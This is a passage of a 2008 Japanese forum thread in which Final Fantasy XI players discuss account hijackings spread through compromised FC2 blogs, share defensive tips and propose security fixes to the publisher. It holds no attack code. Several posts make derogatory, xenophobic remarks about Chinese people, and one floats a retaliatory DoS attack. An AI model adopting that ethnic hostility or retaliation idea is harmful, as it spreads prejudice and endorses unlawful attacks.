みなさんのフレにも告知してあげてください!

295 名前:既にその名前は使われています [2008/03/25(火) 00:15:12.22 ID:WD+HwGs7]
>>293
今日このスレ初めて見て、怖くなったからPG2入れた。
FC2系のブログは当分見ないことにした。
無関係なHPまで改竄されたらどうしょうもないが、少しでも可能性減らすように
自衛するしかないよね・・・。

296 名前:既にその名前は使われています [2008/03/25(火) 00:17:52.26 ID:czdY66qa]
>>291
インスコしてなければおk

Realplayerの代わりにReal Alternative入れている人も古いActiveXコントロールが
インスコされるので注意。

297 名前:既にその名前は使われています [2008/03/25(火) 00:18:43.66 ID:jhdd7oxY]
バハ鯖で2日連続垢ハックwwwwww
被害者鯖スレに降臨中

298 名前:既にその名前は使われています [2008/03/25(火) 00:23:29.00 ID:nQ1aeD7W]
取り合えずパスは用心して変えておいた

299 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 00:24:20.68 ID:gAnYPalN]
GMも垢ハック専用窓口を24時間体制で作れ!
自キャラがハックされてアイテムトレードしながらうろうろしているのを2時間も3時間もみてるだけってありえんだろ?!
サポセンの電話は昼間だけだし・・・・・・


300 名前:既にその名前は使われています [2008/03/25(火) 00:38:30.70 ID:ZVcNVdfz]
俺ハックされたら鯖スレにキャラネーム晒してなんとかして助けてもらおうとするだろうなw
だって5年も育てたキャラなんだぜ・・・いきなり何もかも失うとか超嫌だ。
ホント自分必死すぎでキモイ。



301 名前:既にその名前は使われています [2008/03/25(火) 01:00:12.55 ID:omlW/ixG]
>>300
だが昨日はそれで助かったのかもしれない
必死だと思うのはしかたなかろうw

302 名前:既にその名前は使われています [2008/03/25(火) 01:03:42.77 ID:wU4wL3FZ]
POLシステムを改良するか、サポセン24時間をすぐやれ!!


303 名前:既にその名前は使われています [2008/03/25(火) 01:11:36.40 ID:f5GA3rVo]
バハ鯖スレみてきたよ。
昨日といい今日といい、サポセン動いてない時間狙ってるんだろうなぁ。

同じ鯖の人がああいう状態になったら力になってあげようと思うよ、ほんとまじで。。

これからどんどんハックされる人でてくるんだろうなぁ、
有名ブログが改ざんされたわけだし。

まじで、業者ゆるせん

304 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 01:17:32.63 ID:vFPHu9Hl]
・サポセンの24時間サポート
・指定されたISP(IP)からのみログイン可
・パスワードなどのアカウント情報変更時に秘密の質問
・アカウント情報変更後にユーザーにメールで変更のお知らせ
・ログインメッセージ・公式サイトのトップページで注意喚起
・LSCへのログインをPOLは別のID・パスワードに変更

このくらいはやってもらわんと・・・てかサポセンの24時間サポート以外は
すぐ出来ると思うんだがな。 
それにしてもLSCなんてセキュリティ意識のある人間が作ったとは思えない仕様だな
・・・この辺NAに突っ込まれてたしスンヂ馬鹿すぎるだろ。




305 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 01:18:08.85 ID:rMVWg75a]
関わると危険だと言う意識が広まってしまうと、買い手が激減するだろうし
業者が自分で自分の首を絞めてるようにも思えるが・・・
こんなことが起きても、まだ買う奴なんているのかねぇ。


306 名前:既にその名前は使われています [2008/03/25(火) 01:23:18.89 ID:9f0lVnnD]
PS2だけど、PCでLSコミュニティとか使ってたし
怖いからPOLのパスワード変えといたぜー。
これでもうLSコミュニティとか二度と使わなければ
一安心かな?まあでも定期的にパス変えよっと。
おそろしやおそろしや。

307 名前:既にその名前は使われています [2008/03/25(火) 01:25:00.75 ID:jhJ+BovV]
>>305
自分は大丈夫。もしくはまた垢買うからいいんじゃね?
っていう思考じゃないかな

308 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 01:25:11.33 ID:elGAe1vY]
ここでの報告見てると
バハ鯖の人が多いのかなとか関係ないことを考えてしまうバハ民

前、救えネの洋ゲーやってたときはGMコールとか24時間対応で
返事から行動まですぐ対処してくれてたんだけどなー
もう、そこまで力入れてないってことなのか・・・

垢ハックなんてソフト開発側じゃある程度までしか出来ないだろうし
メンテがそれの対策ならいいんだけどね
個人のデータ管理とOS側に頼るんだろうなー

309 名前:既にその名前は使われています [2008/03/25(火) 01:25:25.04 ID:pm+l6zsS]
ここが■の岐路だな。
きっちりとした対応や保証を打ち出せればアップ内容がクソとか目を瞑ってもいいぐらい評価されるはず。
が、今までの上から目線での適当な対応を続けるようなら遠からずFFは終るだろう。
次世代オンゲにも人が集まるわけは無い。
業者問題はネトゲやるならこれからもずっと付き纏うだろうからな…。

310 名前:既にその名前は使われています [2008/03/25(火) 01:27:04.26 ID:7ZgQEQ9q]
赤ハックされてないが俺もバハ鯖民だ
まぁ俺はPS2だから大丈夫だとは思うけどな…



311 名前:280 [2008/03/25(火) 01:31:21.14 ID:mx3cOLzk]
280です。まだGMきません。
このシステムもいい加減にしてほしいですね。
メンテまで@30分。
こないで終わっちゃうかなぁ。
くやしいなぁ

312 名前:既にその名前は使われています [2008/03/25(火) 01:32:16.79 ID:9f0lVnnD]
>>311
がんばれ!泣き寝入りだけはしてほしくない!

313 名前:既にその名前は使われています [2008/03/25(火) 01:35:42.94 ID:yV1jINTG]
ソースコード書き込まれたらアウトならwikiとか危ないと思うんだけど違うの?

314 名前:既にその名前は使われています [2008/03/25(火) 01:38:12.64 ID:4E2nw6wM]
>>313
あってる

315 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 01:38:48.39 ID:CPKgTWTl]
FFのWikiでリンク先を罠サイトに書き換えられたことはあった。
今はリンクたどって飛ぶときは警告出るようになってたはず。
ジョブ別のWikiはわからん…

316 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 01:40:05.02 ID:slcFTapg]
wikiを見るだけで感染
ということはまったくないのだろうか?

317 名前:既にその名前は使われています [2008/03/25(火) 01:40:25.33 ID:9ZDfFG9H]
サービスは365日24時間なのに、サポセンはお休み有。
ふしぎ

318 名前:既にその名前は使われています [2008/03/25(火) 01:41:28.99 ID:vHIgAKgq]
フレのフレがさっきハックされた。
さっきまでGMと交渉中だったらしいが、身近に起こるとまじで怖いな、てかむかつくage

319 名前:既にその名前は使われています [2008/03/25(火) 01:44:02.30 ID:hs/jxftM]
頭おかしいよ業者
逆にDoS攻撃出来ないかな

320 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 01:46:17.19 ID:7Ffb97n9]
>>317
仕方ない 中の人だってヒトの子だ
もし過労死なんかされたら被害者であるはずのこっちが殺人者扱いされる
てけとーなバイト雇って今以上にてけとーな対応されても困るし



321 名前:既にその名前は使われています [2008/03/25(火) 01:46:49.14 ID:6E0RlrkX]
今回被害にあって警察いって
電子データ?が被害にあったと認められ、被害届け受理されて、何らかの対処まで行くとするならば。
■がこれまで主張していた、ゲームデータはスクエアに所有権が帰属するって一方的に主張してるのがくつがえるかもな
たとえ、ゲーム会社が契約で書いて承諾させたとしても、その文章が違憲となれば、データはユーザー側のものとなって
このくそのろい対応や、セキュリティや管理に注意を払わせることにつながらねーかな?
金もらってサービスを受けてるのに、ろくなサポートもしねー。
何かをいっても、華麗にスルー、あまりにも顧客を馬鹿にしすぎてきた■にそろそろ鉄槌をくだすべきじゃねーか?
今回だけは明日はわが身だ


322 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 01:47:42.14 ID:ysJWQJk7]
>>320
同じ人が常時対応してるワケじゃねーだろw

323 名前:既にその名前は使われています [2008/03/25(火) 01:48:27.67 ID:9ZDfFG9H]
今回のは結構被害者多そうな。

324 名前:既にその名前は使われています [2008/03/25(火) 01:48:48.23 ID:9f0lVnnD]
>>321
だよなあ。いままで不正もなにもしていない
ふつーのユーザーが突然被害にあうんだもん。怖すぎるよー。
明日はわが身だ。

325 名前:既にその名前は使われています [2008/03/25(火) 01:52:33.09 ID:xwSNSLwB]
業者はbotネット使って、DDoS攻撃してくるんじゃ?
それはさておき、パスワードやめてUSBトークンとか使った鍵認証とかにすればいいのにな。
PS2やPS2にもUSBつなげそうだし。追加数千円(導入時のみ)でだせば結構売れるかも?

326 名前:既にその名前は使われています [2008/03/25(火) 01:52:57.22 ID:4E2nw6wM]
>>321
セキュリティは本人のせいだろうに
鯖ハックされたんなら■eの責任だろうけど
つか、警察は動くよ。でも電子データがどうのこうのは関係なく、トロイ配布とかそれに準ずる行為のほうでだけど
■eのGMの対応は、あれ以外やりようがないだろwこないだ、他人にID売ってから
サポセン電話してキャラ取り返したアフォが出たからな、本人と確認出来ても危ないってこった

327 名前:既にその名前は使われています [2008/03/25(火) 01:53:31.73 ID:xwSNSLwB]
>>325
PS2やPS3だorz

328 名前:既にその名前は使われています [2008/03/25(火) 01:53:38.76 ID:2UE3q0B9]
fc2の一件から被害の報告が増えたなー
ここに来てる報告だけでもこれだけあるんだから、相当被害が拡大してると思うんだが。
せめて公式にアナウンスして欲しいもんだ。
ネ実で頑張って啓蒙しても、■が誇る数十万ユーザーに情報が行き渡るわけじゃないんだからさ

329 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 01:54:44.80 ID:rNeX04xY]
アカウントハックされてますってすぐにこないGMも糞だな。

330 名前:既にその名前は使われています [2008/03/25(火) 01:57:26.83 ID:wc2s+Fxx]
だとしても■側が出来るレベル、やって当然のレベルの対応を怠ってるってのは何度も言われてきてるんだよな。
暗号化ファイルをそのまま別のPOLクライアントに入れたらそのまま動くとかさ。
正直RMT利用者への対応とか変えないとダメだろ。現状RMTでBANされてもキャラ名出るわけでもないんだし、
「RMTやってた」って罪でBANされた事を前面に出さないと業者はもっと悪質な手に出る可能性もある。



331 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 01:57:38.83 ID:CPKgTWTl]
GMのまにゅあるwでアカハックの優先順位がまだ低いんじゃない?
地形ハマリとかは何件待ちでも5分くらいで来る。優先順位が高く設定されてて
すぐに対応するように決められると思う。
垢ハックは通常のコールと同じ優先順位の対応なんだろう。

332 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 01:57:43.45 ID:slcFTapg]
カスペでスキャンしたとき
ロックされてるって出る部分は安全なの?

333 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:01:35.72 ID:zAORBuM/]
住んでる地域や使用プロバイダやIPの情報を自分で登録して、そこ以外から
接続あっても繋ぐことができない、みたいなシステムってスクエニ側で作れないの?
ネカフェとか友達の家で繋ぎたいって人だけ制限をボタン1つで解除できるようなシステム

334 名前:280 [2008/03/25(火) 02:01:51.03 ID:mx3cOLzk]
くそ!メンテ時間までに来なかった。
直前までハック野郎がフレの倉庫でアクセスしてて、なにもできないのがすげームカついた!
明日も朝からGM呼んでみるか。


335 名前:既にその名前は使われています [2008/03/25(火) 02:02:57.84 ID:9f0lVnnD]
>>334
がんばって!!

336 名前:既にその名前は使われています [2008/03/25(火) 02:03:03.50 ID:9ZDfFG9H]
このメンテは何かの対策なのか、それとも単なる不具合の修正なのか・・・

337 名前:既にその名前は使われています [2008/03/25(火) 02:04:57.38 ID:9HKbKXJk]
対策ならPOLもメンテ入るだろうよ
今月いっぱいシカトするなら俺もちょっと引退考えるな
ついていけない

338 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:05:52.80 ID:QVf8SjqO]
パスワード2つ発行すればいいんじゃないか?
ひとつは、いままでのIDとPASS。
もうひとつは非常用のIDとPASS。これはPOL上では保存せず保管。

緊急時には非常用のをPOL上でソフトウェア入力して使用。

あんまいみないかねー。

339 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:07:22.07 ID:rvQA3x19]
新スレ作るしかないか。■が嫌でも動かなきゃいけないくらい、いろんなとこに貼り付けるしかないな。



340 名前:既にその名前は使われています [2008/03/25(火) 02:10:11.67 ID:WT1MZrdK]
尻鯖だけど、知り合いから聞いただけでも今日垢ハックされたの3名
多すぎないか?



341 名前:既にその名前は使われています [2008/03/25(火) 02:10:34.22 ID:6E0RlrkX]
この2,3日はまじで「おまえらー」とかネタスレ作って遊んでる場合じゃねーよ
まじで 

342 名前:既にその名前は使われています [2008/03/25(火) 02:11:08.82 ID:wU4wL3FZ]
>>338
あるでしょ
緊急用で発行されたもので入ると、即時アカウント凍結とか

さらにそれをHPで登録したメアド宛に発行できるといい


343 名前:既にその名前は使われています [2008/03/25(火) 02:12:17.77 ID:hs/jxftM]
支那が喋れない様な日本語の音声認証をですね

344 名前:既にその名前は使われています [2008/03/25(火) 02:12:41.06 ID:9ZDfFG9H]
>>338
24時間対応してるなら、あまり意味ないかもしれんが、
現状では意味あるんじゃね?

345 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:13:41.52 ID:rvQA3x19]
やばすぎだろ。ここまで、堂々とやられてるのに、何も対応しないとは、■倒産してもいいわ。


346 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:14:18.85 ID:QVf8SjqO]
>>341
【RMT業者】おまえら垢ハック大流行なのにFFか【ブログ改竄】

347 名前:既にその名前は使われています [2008/03/25(火) 02:14:50.98 ID:dKvvhOTu]
>>329
アカウントハックされてる奴が多すぎてその順番待ちらしいw
フレがハッキンされて3時間ほど待たされた時の一言

348 名前:既にその名前は使われています [2008/03/25(火) 02:15:38.30 ID:9ZDfFG9H]
大問題じゃないか

349 名前:既にその名前は使われています [2008/03/25(火) 02:15:44.70 ID:WT1MZrdK]
身近な人間がやられるまでは対岸の火事と思えるが
実際に知り合いがやられると、理不尽な相手に対する怒りと
盗まれたキャラを目の前で見ながら何も出来ない無力感に絶望する

350 名前:既にその名前は使われています [2008/03/25(火) 02:15:54.43 ID:/5SLOYFD]
もうゲーム内での迷惑行為ではなくてリアルに犯罪だもんなあ。
犯罪で金稼ぎ。



351 名前:既にその名前は使われています [2008/03/25(火) 02:15:59.57 ID:b1jIPTS8]
そんなファッキングされてんだwwwwwwwwwwwwww


352 名前:既にその名前は使われています [2008/03/25(火) 02:17:16.72 ID:auLaoDR9]
競売のサイトの奴とかも怖いぜo(`д´o)

353 名前:既にその名前は使われています [2008/03/25(火) 02:17:26.74 ID:2UE3q0B9]
よくフリーメールとかにある「パスワードを忘れて再発行する時のための秘密の質問」
みたいのはどうだろう。
ペットの名前なり親の誕生日なりを設定して、たとえ外部から不正アクセスされてパスを
変えられても、ネットからそれでパスの再発行かアカウントの凍結ができるようにするとか。
今一番問題なのは、パスの再発行が時間の限られてるサポセンでしかできないって点だしね。
それさえ改善できれば少しはこっちの気苦労というか焦燥も無くなるんだけどな

354 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:18:48.15 ID:vFPHu9Hl]
GM>垢ハック被害のコール多くて頭おかしくなって死ぬ

355 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:18:51.29 ID:rvQA3x19]
すれたてしただけで、罠にはひっかからないよな・・・?

356 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:21:29.75 ID:n1eE+/LN]
サポセン体制やらさらなる対策を行うとすれば
その分のコストをどこから出すのかが問題かねぇ
月の課金額をリネ2並みにするなりしないと
株式会社としては利益を削る方向には動けないだろうし

357 名前:既にその名前は使われています [2008/03/25(火) 02:22:56.51 ID:9f0lVnnD]
>>355
安心してスレ立てしておk。

2chがハッキングされたことってあるの?w

358 名前:既にその名前は使われています [2008/03/25(火) 02:24:08.74 ID:9f0lVnnD]
>>356
本当にサポートやサービスが良くなるのなら
少々値上がりしても文句ないなー。

359 名前:既にその名前は使われています [2008/03/25(火) 02:24:24.31 ID:hpBmpOa9]
アカハックされたときFFからGMコールして6時間またされたなぁ
夜間だとPOLから呼んだほうがはやいかも?

360 名前:既にその名前は使われています [2008/03/25(火) 02:24:39.85 ID:czdY66qa]
>>357
クラックされてログが消えたことがあったかと



361 名前:既にその名前は使われています [2008/03/25(火) 02:25:16.82 ID:58aTjjEl]
>>347
マジっすかw

有名FC2ブログ改竄の件で被害者がめちゃ増えたんだろうな。
FC2ブログが危ないってこのスレ追いかけてなきゃ分からない事実だったし。
信頼の置けるブログがハックされて罠仕掛けられてるなんて普通は思わないよ。

スクエニもシカトするのいい加減限界なはずなんだが、よく放置できるな。
既に信頼は地に落ちてるよ。
次世代MMO立ち上げても誰も付いて来ないんじゃないの?w

362 名前:既にその名前は使われています [2008/03/25(火) 02:25:20.96 ID:9f0lVnnD]
>>360
そうなのか!こわいなあ〜。

363 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:26:15.59 ID:9HKbKXJk]
>>357
何度かあるよ
ここ4年ほどないと思うけど

364 名前:既にその名前は使われています [2008/03/25(火) 02:27:39.10 ID:o+wp7W1W]
>>353
悪くはないと思うが、
アレって結構ザルなんだよねぇ

誕生日や好きなヒーローとかは設定するのはいいが、
試行回数が無限だとパスワードアタックし放題

大手サイト程この傾向が多いしねぇ

365 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:29:32.08 ID:OoZjY94u]
24時間サポセンLS立ち上げました。あなたのキャラを24時間監視します。
入会金500万 携帯 メルアド 交換で緊急時もすばやくサポート。

366 名前:既にその名前は使われています [2008/03/25(火) 02:30:10.05 ID:bABkRSNM]
>>361

> スクエニもシカトするのいい加減限界なはずなんだが、よく放置できるな。
> 既に信頼は地に落ちてるよ。
> 次世代MMO立ち上げても誰も付いて来ないんじゃないの?w

スクエニの対応が後手後手な感は否めないけど
開発を氏ね糞etcって連呼しながら、解約しない連中がゴロゴロしてるだけに
騒ぎが収まったら熱しやすく冷めやすい国民性と相まって、忘れて付いて行きそうだぞw

367 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:31:45.41 ID:rNeX04xY]
ゲーム離れとか色々一因あるが、FF11の数々の対応で■製品買わないって人
多いよ。

368 名前:既にその名前は使われています [2008/03/25(火) 02:32:14.10 ID:xwSNSLwB]
POLログインの度にメール届くようにしてもいいかもな。
気分的には少し安心はできそう。
でもハックされて自宅いないときにメールきたらパニックだなw

登録しといた暗証キーみたいなのをメールすると一時的にアカウントロックもいいな。

369 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:32:21.77 ID:zaHEJYEH]
緊急メンテで垢ハックしにくくなる細工でも!?
と考えて一瞬幸せになったが2時間でこんなのどうこうできるわけもないし
第一もう対処する気ないんだろうなということを思い出したのでまたがっくり

370 名前:既にその名前は使われています [2008/03/25(火) 02:32:54.46 ID:jq6H0asz]
何も言わずに黙っているよりはマシだろう
解約するのが一番ではあるがね



371 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:34:01.51 ID:fAiOj5Ix]
>>369
はっきりと言おう。
スクエニにそんなテクニックがあるわけがない。
それ以前にそんな手間をすすんでかけるわけがない。

372 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:35:41.62 ID:rNeX04xY]
開発期間入れると8年くらい前のだからシステム的に無理なんんじゃないかな。

373 名前:既にその名前は使われています [2008/03/25(火) 02:35:51.83 ID:wc2s+Fxx]
タイトル:
■垢ハック大流行なのにお前らFFか■
内容:
先週末から今週頭にかけた、ここ数日の垢ハックの件数はただ事じゃない。
PS2や箱ユーザーにも被害が出るなどもはや「セキュリティは自己責任」と言ってる場合じゃない状況だ。
鯖板などにも被害者が降臨し、状況は俺たち一般ユーザーレベルの手に負えない所まで来ている。
ここらで一度■に抜本的なアカウント保護システム整備要求やヴァナ内でのシステムメッセージでの警告、
加えてRMT利用者へのBANにキャラ名を出すなどの厳しい対応を要請する事を訴える必要があるかと思う。
RMT行為とそれを行なう業者は既に犯罪行為の域であり、FFと無関係なブログの改竄など被害はゲーム外にも及んでいる。
自キャラやフレを大切に思うのならこの件について無痴でいるのはあまりに無謀すぎるのではないだろうか。

なお、セキュリティ技術などについての話題は 
●● RMT業者の垢ハックが多発している件14 ●●
live27.2ch.net/test/read.cgi/ogame/1206294621

こんな感じで作ってみた。■に対して声を上げたい人用。
俺は立てられなかったから誰か代理で頼む。

374 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:35:55.23 ID:QVf8SjqO]
>>365
中華RMT業者連合にIDを教え、月額払うとハックされなくなります。
さらにはRMTも快適サポート、すばやくご希望のギル、アイテムをご用意できます。
あなたも快適、安心ヴァナライフを!

375 名前:既にその名前は使われています [2008/03/25(火) 02:36:38.95 ID:jq6H0asz]
ハックされたら、関連垢一斉ロックくらいの強硬措置取らないと
業者は痛くもかゆくも無いだろうな
つーか、トレード系は一切保証無しとか■eもアホだろ
業者にどうぞトレードでギルアイテム渡して下さいって言ってるようなもんだ

376 名前:既にその名前は使われています [2008/03/25(火) 02:36:50.63 ID:kqeba7Nf]
FC2が対策すべきじゃないの?

377 名前:既にその名前は使われています [2008/03/25(火) 02:37:58.57 ID:OfQJmMS+]
■も対応するべきだよな
こんなに簡単に漏れるんじゃpassの意味が全くないよね

378 名前:既にその名前は使われています [2008/03/25(火) 02:39:18.32 ID:9f0lVnnD]
>>373
やってみたら出来たwwww
たてたぜ!ほめて!

379 名前:既にその名前は使われています [2008/03/25(火) 02:40:27.50 ID:wc2s+Fxx]
>>378
ほう経験が生きたな
まじありがとう 最高だよ

380 名前:既にその名前は使われています [2008/03/25(火) 02:41:09.04 ID:9HKbKXJk]
今月も凍結されたギルの総額を発表するんだろうけどそれって垢ハックで得たお金かと思うと・・



381 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:41:55.41 ID:rNeX04xY]
ネ実で注意喚起に効果的なのはスレ立てよりもななしを変更することだよ。

382 名前:既にその名前は使われています [2008/03/25(火) 02:42:25.86 ID:/5SLOYFD]
>>378
スレ立てすごいですね

383 名前:既にその名前は使われています [2008/03/25(火) 02:43:16.42 ID:9f0lVnnD]
それほどでもないwwwww

384 名前:既にその名前は使われています [2008/03/25(火) 02:45:21.90 ID:czdY66qa]
謙虚だwww

385 名前:既にその名前は使われています [2008/03/25(火) 02:47:13.40 ID:dKvvhOTu]
代々より憎き親や友人の敵とばかりに嫌っている日本人相手に
精神的ダメージを与えつつ、自らの懐も潤い
日本人の悔しがってるレスをみて中華も笑いが止まらないんだろうな
まさにざまぁwwwwwって感じなんだろうけど
ムカついてしょうがない



386 名前:既にその名前は使われています [2008/03/25(火) 02:48:42.80 ID:LSyEbnyY]
今回の事をスルーしたらマジ終わってるな

387 名前:既にその名前は使われています [2008/03/25(火) 02:48:48.89 ID:9f0lVnnD]
まあいまどき世界の嫌われ者なんだけどね、中国。

388 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:51:44.92 ID:slcFTapg]
あぶねーから気をつけろって話しても
全然「俺関係ねーw」って感じの人多い
こりゃアカン

389 名前:既にその名前は使われています [2008/03/25(火) 02:53:35.34 ID:dKvvhOTu]
FC2のアドを踏んだらハッキングされた!って思うくらい
強い気持ちと自衛が欲しいところだ

390 名前:ハックオン・ストラトス [2008/03/25(火) 02:53:47.99 ID:auLaoDR9]
狙い撃つぜっ!!o(`ω´*)o



391 名前:既にその名前は使われています [2008/03/25(火) 02:54:56.49 ID:9f0lVnnD]
>>388
そうなんだよね。
証拠をだせって言う人もいるし。
もうちょっと危機感持ってもいいと思うんだけど。

392 名前:既にその名前は使われています [2008/03/25(火) 02:55:24.91 ID:dKvvhOTu]
Elemenがこれやられた時FF終わるな

393 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 02:56:47.60 ID:PhXDparI]
うちの周りの奴らも、他人事としか思ってない
結局、そんなもんだよなぁ…

394 名前:既にその名前は使われています [2008/03/25(火) 02:58:31.06 ID:V2mh3qpS]
アンチウィルスソフトも未だに入れてない人すらいるよ 
言っても人ごと、聞く耳なし 
自分か身内が被害にあわないと、たぶん分からないんだろうな 


395 名前:既にその名前は使われています [2008/03/25(火) 02:59:03.55 ID:wc2s+Fxx]
だからこそ公式でのより強いアナウンスが必要なんだよ。
もしくは雑誌でセキュリティの特集組んでもらうよう働きかけるとかな。

396 名前:既にその名前は使われています [2008/03/25(火) 02:59:29.76 ID:fAiOj5Ix]
>>388
ワームの中には自己アップデートするヤツとかある気がするし、ゲーム以外にも何らかのデータを
引き抜くアップデートもするかも知れんし処理を遅くする原因になるかもしれん。
今後 俺関係ねーw で済むかねぇ・・・

つか、自分のブログとか勝手にいじられて気持ち悪くないのかその人たちは。

397 名前:既にその名前は使われています [2008/03/25(火) 02:59:39.96 ID:9ZDfFG9H]
elemenとか合成系とかは大丈夫なんかね・・・

398 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:00:11.18 ID:hKaE50zj]
PS2だけでやってたけどFFXIのハックに限らないから心配になってきたわ・・・

今のところkingsoftとSpybot使いながらオンラインスキャンしてる程度だけど
ノートンでも入れようかな(´Д`;)ヾ

399 名前:既にその名前は使われています [2008/03/25(火) 03:01:03.17 ID:wU4wL3FZ]
>>394
入れても期限が切れたまま放置もいるな


400 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:01:23.04 ID:DxM7+BBt]
ネットワーク機器設定で
出荷時の初期設定が、最低限だけ許可してるものでも

「よくわからないしめんどくさいからぜんぶ許可」

ってのが多すぎて困る。
そんなことで電話すんな。マニュアル読んでください。いやほんとに頼みます。




401 名前:既にその名前は使われています [2008/03/25(火) 03:01:23.99 ID:o+wp7W1W]
ヴァナモンがやられたぐらいだしな

ある意味公式サイトより利用度が高いelemenやられたら、
被害は予想もつかんな

402 名前:既にその名前は使われています [2008/03/25(火) 03:01:30.05 ID:/5SLOYFD]
javaはオフにしたほうがいいよと言っても
ニコニコ見られなくなるしオンのままでいいわw
と返されたりするしね。
ほんと危機感はまるでないよ。

403 名前:既にその名前は使われています [2008/03/25(火) 03:01:54.82 ID:qu/cuoZy]
ルーター通して感染とかあるかな?
FFやるPCはもうFF専用になってるけど別PCで踏んでるかもしれない・・

とりあえずPS2からPOLのパス変えてPG2導入してマルウェア駆除とかもやった。
それでも怖くてしょうがない・・

404 名前: [―{}@{}@{}-] 既にその名前は使われています [2008/03/25(火) 03:03:13.18 ID:HqnC3LpX]
マイナー雑誌にFFの垢ハク記事書いた
読者受けは良くなかったかもしれない

405 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:03:47.56 ID:QRet0Lrm]
垢ハック関係のスレがこれだけ伸びまくってるのをみれば、
ユーザーの関心がどれだけ高いかわかるだろうに。

こういうことに力入れるべきだよ。
廃コンテンツ増やしてる場合じゃねえよ。

406 名前:既にその名前は使われています [2008/03/25(火) 03:04:04.36 ID:F65+mqFc]
ヴァナモンってblogだけっしょ?
モンスのLVサーチとかするとこは問題ないんじゃねえの?

407 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:04:07.55 ID:rvQA3x19]
もうどんどん書いちゃっておk!

408 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:04:17.73 ID:rNeX04xY]
穴が開いてたら問答無用に感染したコードレッド騒動覚えてない人多いのかな?


409 名前:既にその名前は使われています [2008/03/25(火) 03:04:45.70 ID:KvRYpdDq]
罠見つかってないblogとかサイトとか有るような気もするんだけど
調べるのも大変そうだしなぁ。
FF11関連の情報は山ほど有るからね。
さっぱり更新されていない所に張られたら、直してもらおうにも管理人さんに
連絡つかなさそうだ。

410 名前:既にその名前は使われています [2008/03/25(火) 03:05:46.20 ID:gG9qutBm]
>>403
PS2でしかプレイしてない奴でもルーターでPCと繋いでてウィルス踏んだらアボン



411 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:06:46.03 ID:rNeX04xY]
>>398
キングソフトはうんこで有名で更にシナ製品。
AVG、AntiVir、avast!、BitDefenderとか無料のでソレよりいいのあるし、有料なら
カスペ入れとき。

412 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:07:10.53 ID:DxM7+BBt]
>>408
この時期は知らんでしょう。Nimdaすら知らん人多い。

413 名前:既にその名前は使われています [2008/03/25(火) 03:07:10.44 ID:9HKbKXJk]
>>403
今のとこ報告はないけど可能性としてはあり

414 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:08:22.74 ID:PhXDparI]
結局、感染源を広げたのはFC2とかのブログだよな
全く見に行ってないから分からんが、公式で告知してんのかね

つか、この話題、まだ大手ニュースサイトでも取り上げられてないよな

415 名前:既にその名前は使われています [2008/03/25(火) 03:08:42.73 ID:jhJ+BovV]
>>402
JAVAとJavaScriptは言葉使い分けような、とお約束w
まぁ両方必要が無ければきっておく事にかわりが無いが

416 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:09:54.72 ID:rNeX04xY]
>>404
珍しい奴がおるな、FF11やってたっけ?

417 名前:既にその名前は使われています [2008/03/25(火) 03:10:39.67 ID:9HKbKXJk]
>>414
FC2が一番不気味
裏で業者から金もらってんじゃね?っておもうくらい怠慢
罠サイトの根城にもなってるしここ数日の出来事じゃないんだぜ?

418 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:10:59.08 ID:hKaE50zj]
>>411
ありがとう、とりあえずAVG入れてみるよ。


419 名前:既にその名前は使われています [2008/03/25(火) 03:12:01.64 ID:qxJBwIeb]
>>415
確信犯とかに一々突っこむタイプ?

420 名前:既にその名前は使われています [2008/03/25(火) 03:12:22.89 ID:o+wp7W1W]
一般ユーザにJavaとJava Scriptの使い分けを要求するのはコクだと思うわw
こんなんIT業界系だけ知ってればいいよw

■が根本対策しない(できない)なら、
まずはフレが突然いなくならないように、
注意喚起だけはしとこうぜ



421 名前:既にその名前は使われています [2008/03/25(火) 03:12:33.02 ID:xwSNSLwB]
>>410
いろいろ突っ込みどころありそうだが
詳細希望。
コリジョンドメイン異なるのに通信傍受できるとかは言わないよね?

422 名前:既にその名前は使われています [2008/03/25(火) 03:14:38.32 ID:DxM7+BBt]
>>414
FC2は設営者がアクセスしてきた対象のlogを
簡単に取ることが出来る仕組みを作ったから狙われているんじゃないかな?

423 名前: [―{}@{}@{}-] 既にその名前は使われています [2008/03/25(火) 03:14:50.25 ID:HqnC3LpX]
>>416
恐らくは人違いだろうが2002年の6月からやっとる

424 名前:既にその名前は使われています [2008/03/25(火) 03:15:20.54 ID:qu/cuoZy]
>>410 >>413
レスありがとう、なんかやる事やっても危険性があるって怖いなぁ。
最高の予防策としては怪しいURL踏まないってことなんだろうけど
いい情報載せてる有名ブログにも仕掛けられてると来たらもう何も見れなくなる・・
